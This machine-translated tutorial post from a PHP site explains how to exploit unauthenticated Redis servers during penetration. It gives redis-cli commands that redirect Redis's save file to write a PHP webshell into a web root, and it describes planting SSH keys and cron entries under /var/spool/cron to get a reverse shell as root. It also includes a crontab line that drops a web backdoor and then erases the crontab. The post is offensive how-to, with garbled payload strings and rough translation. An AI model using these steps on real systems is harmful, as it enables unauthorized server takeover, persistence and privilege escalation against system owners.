简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Home > php教程 > PHP开发 > body text

Redis anonymous access utilization tips

高洛峰
Release: 2016-11-14 09:22:46
Original
1561 people have browsed it

Redis database is relatively common in intranet penetration. Combined with the recent utilization process, record it as follows:

Download Redis in the intranet machine, unzip and make it, no need to make install

A) Under normal circumstances, you know the path and write the shell

./redis-cli -h IP  
config set dir /home/wwwroot/default/  
config set dbfilename redis.php 
set webshell " phpinfo(); ?>"  
save
Copy after login

B) Use the public key to log in without a password 1 Generate the public key locally 2 Use redis to back up the public key to the redis machine C) Use the Linux task to rebound the shell

1 /var/spool/cron The default scheduled task under the Linux machine, When cron is turned on, Linux will regularly execute the tasks inside. The file name is username 2. Redis sets dbfilename to the above and you can directly bounce the shell back. In summary, the above three methods are mainly used to obtain the permissions of the redis server, because redis is generally They are all started with root privileges, so they have great permissions.

But there will always be unexpected situations during the penetration process, are there any?

The first method, if the redis database is too large, causing the PHP horse to exceed the limit, and directly 500 will not be parsed, then we can write a horse to the web directory through the third command

*/1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r
Copy after login

Such a horse will be no problem

The second way, I tested the machine without any problem, but when it comes to the penetration environment, there is a problem. It should be the ssh password-free login. The ssh directory permissions problem, the chance of success is not very high

The third way, the favorite one , simple, crude and clear, even elevating privileges is omitted (if it is an important machine, the root user will usually have scheduled tasks. It is recommended to use a low-privileged user to rebound a shell to explore the situation first, in root), but I also encountered very strange things. If you don’t allow machines to connect to the external network, you can only write a shell to the web directory, or monitor a bashshell on the internal network, and connect yourself. Another discovery of redis is that higher versions of Linux cannot escalate privileges. , we can also directly escalate privileges through redis, which is a method for third-party software to escalate privileges.

Related labels:
redis
source:php.cn
Previous article:Teach you how to implement a sales funnel Next article:Basic Linux command format and directory processing commands
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Symfony Redis cannot connect to the host defined in the env file, which defaults to localhost We have a new Symfony setup with Redis as the caching mechanism. We want to connect to a s...
From 2024-04-06 10:53:02
0
1
375
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!